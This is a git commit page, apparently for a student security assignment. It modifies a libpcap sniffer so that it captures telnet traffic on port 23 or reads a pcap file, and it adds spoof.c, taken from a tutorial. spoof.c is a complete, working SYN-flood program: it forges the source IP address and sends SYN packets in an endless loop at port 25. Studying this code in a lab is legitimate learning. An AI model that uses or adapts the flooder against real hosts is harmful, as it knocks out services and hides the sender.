Modified sniffex.c to fit assignment specifications. Added spoof.c from a spoofing tutorial.
This commit is contained in:
Alex Huddleston
parent
94960008cd
commit
2dc7015d7a
3 changed files with 117 additions and 7 deletions
18
sniffex.c
18
sniffex.c
|
|
@ -507,7 +507,7 @@ int main(int argc, char **argv)
|
|||
char errbuf[PCAP_ERRBUF_SIZE]; /* error buffer */
|
||||
pcap_t *handle; /* packet capture handle */
|
||||
|
||||
char filter_exp[] = "dst portrange 10-100 and tcp"; /* filter expression [3] */
|
||||
char filter_exp[] = "port 23"; /* filter expression [3] */
|
||||
struct bpf_program fp; /* compiled filter program (expression) */
|
||||
bpf_u_int32 mask; /* subnet mask */
|
||||
bpf_u_int32 net; /* ip */
|
||||
|
|
@ -515,11 +515,19 @@ int main(int argc, char **argv)
|
|||
|
||||
print_app_banner();
|
||||
|
||||
// Check if file arg is passed.
|
||||
int read_file = 0;
|
||||
|
||||
/* check for capture device name on command-line */
|
||||
if (argc == 2) {
|
||||
dev = argv[1];
|
||||
}
|
||||
else if (argc > 2) {
|
||||
else if (argc == 3) {
|
||||
if (!strcmp(argv[1], "file")) {
|
||||
read_file = 1;
|
||||
}
|
||||
}
|
||||
else if (argc > 3) {
|
||||
fprintf(stderr, "error: unrecognized command-line options\n\n");
|
||||
print_app_usage();
|
||||
exit(EXIT_FAILURE);
|
||||
|
|
@ -547,8 +555,14 @@ int main(int argc, char **argv)
|
|||
printf("Number of packets: %d\n", num_packets);
|
||||
printf("Filter expression: %s\n", filter_exp);
|
||||
|
||||
if (read_file) {
|
||||
printf("%s\n", argv[2]);
|
||||
handle = pcap_open_offline(argv[2], errbuf);
|
||||
}
|
||||
else {
|
||||
/* open capture device */
|
||||
handle = pcap_open_live(dev, SNAP_LEN, 1, 1000, errbuf);
|
||||
}
|
||||
if (handle == NULL) {
|
||||
fprintf(stderr, "Couldn't open device %s: %s\n", dev, errbuf);
|
||||
exit(EXIT_FAILURE);
|
||||
|
|
|
|||
96
spoof.c
Normal file
96
spoof.c
Normal file
|
|
@ -0,0 +1,96 @@
|
|||
#define __USE_BSD /* use bsd'ish ip header */
|
||||
#include <sys/socket.h> /* these headers are for a Linux system, but */
|
||||
#include <netinet/in.h> /* the names on other systems are easy to guess.. */
|
||||
#include <netinet/ip.h>
|
||||
#define __FAVOR_BSD /* use bsd'ish tcp header */
|
||||
#include <netinet/tcp.h>
|
||||
#include <unistd.h>
|
||||
#include <string.h>
|
||||
#include <stdio.h>
|
||||
|
||||
#define P 25 /* lets flood the sendmail port */
|
||||
|
||||
unsigned short /* this function generates header checksums */
|
||||
csum (unsigned short *buf, int nwords)
|
||||
{
|
||||
unsigned long sum;
|
||||
for (sum = 0; nwords > 0; nwords--)
|
||||
sum += *buf++;
|
||||
sum = (sum >> 16) + (sum & 0xffff);
|
||||
sum += (sum >> 16);
|
||||
return ~sum;
|
||||
}
|
||||
|
||||
int
|
||||
main (void)
|
||||
{
|
||||
int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP); /* open raw socket */
|
||||
char datagram[4096]; /* this buffer will contain ip header, tcp header,
|
||||
and payload. we'll point an ip header structure
|
||||
at its beginning, and a tcp header structure after
|
||||
that to write the header values into it */
|
||||
struct ip *iph = (struct ip *) datagram;
|
||||
struct tcphdr *tcph = (struct tcphdr *) datagram + sizeof (struct ip);
|
||||
struct sockaddr_in sin;
|
||||
/* the sockaddr_in containing the dest. address is used
|
||||
in sendto() to determine the datagrams path */
|
||||
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = htons (P);/* you byte-order >1byte header values to network
|
||||
byte order (not needed on big endian machines) */
|
||||
sin.sin_addr.s_addr = inet_addr ("127.0.0.1");
|
||||
|
||||
memset (datagram, 0, 4096); /* zero out the buffer */
|
||||
|
||||
/* we'll now fill in the ip/tcp header values, see above for explanations */
|
||||
iph->ip_hl = 5;
|
||||
iph->ip_v = 4;
|
||||
iph->ip_tos = 0;
|
||||
iph->ip_len = sizeof (struct ip) + sizeof (struct tcphdr); /* no payload */
|
||||
iph->ip_id = htonl (54321); /* the value doesn't matter here */
|
||||
iph->ip_off = 0;
|
||||
iph->ip_ttl = 255;
|
||||
iph->ip_p = 6;
|
||||
iph->ip_sum = 0; /* set it to 0 before computing the actual checksum later */
|
||||
iph->ip_src.s_addr = inet_addr ("1.2.3.4");/* SYN's can be blindly spoofed */
|
||||
iph->ip_dst.s_addr = sin.sin_addr.s_addr;
|
||||
tcph->th_sport = htons (1234); /* arbitrary port */
|
||||
tcph->th_dport = htons (P);
|
||||
tcph->th_seq = random ();/* in a SYN packet, the sequence is a random */
|
||||
tcph->th_ack = 0;/* number, and the ack sequence is 0 in the 1st packet */
|
||||
tcph->th_x2 = 0;
|
||||
tcph->th_off = 0; /* first and only tcp segment */
|
||||
tcph->th_flags = TH_SYN; /* initial connection request */
|
||||
tcph->th_win = htonl (65535); /* maximum allowed window size */
|
||||
tcph->th_sum = 0;/* if you set a checksum to zero, your kernel's IP stack
|
||||
should fill in the correct checksum during transmission */
|
||||
tcph->th_urp = 0;
|
||||
|
||||
iph->ip_sum = csum ((unsigned short *) datagram, iph->ip_len >> 1);
|
||||
|
||||
/* finally, it is very advisable to do a IP_HDRINCL call, to make sure
|
||||
that the kernel knows the header is included in the data, and doesn't
|
||||
insert its own header into the packet before our data */
|
||||
|
||||
{ /* lets do it the ugly way.. */
|
||||
int one = 1;
|
||||
const int *val = &one;
|
||||
if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0)
|
||||
printf ("Warning: Cannot set HDRINCL!\n");
|
||||
}
|
||||
|
||||
while (1)
|
||||
{
|
||||
if (sendto (s, /* our socket */
|
||||
datagram, /* the buffer containing headers and data */
|
||||
iph->ip_len, /* total length of our datagram */
|
||||
0, /* routing flags, normally always 0 */
|
||||
(struct sockaddr *) &sin, /* socket addr, just like in */
|
||||
sizeof (sin)) < 0) /* a normal send() */
|
||||
printf ("error\n");
|
||||
else
|
||||
printf (".");
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
BIN
tfsession.pcap
Normal file
BIN
tfsession.pcap
Normal file
Binary file not shown.
Reference in a new issue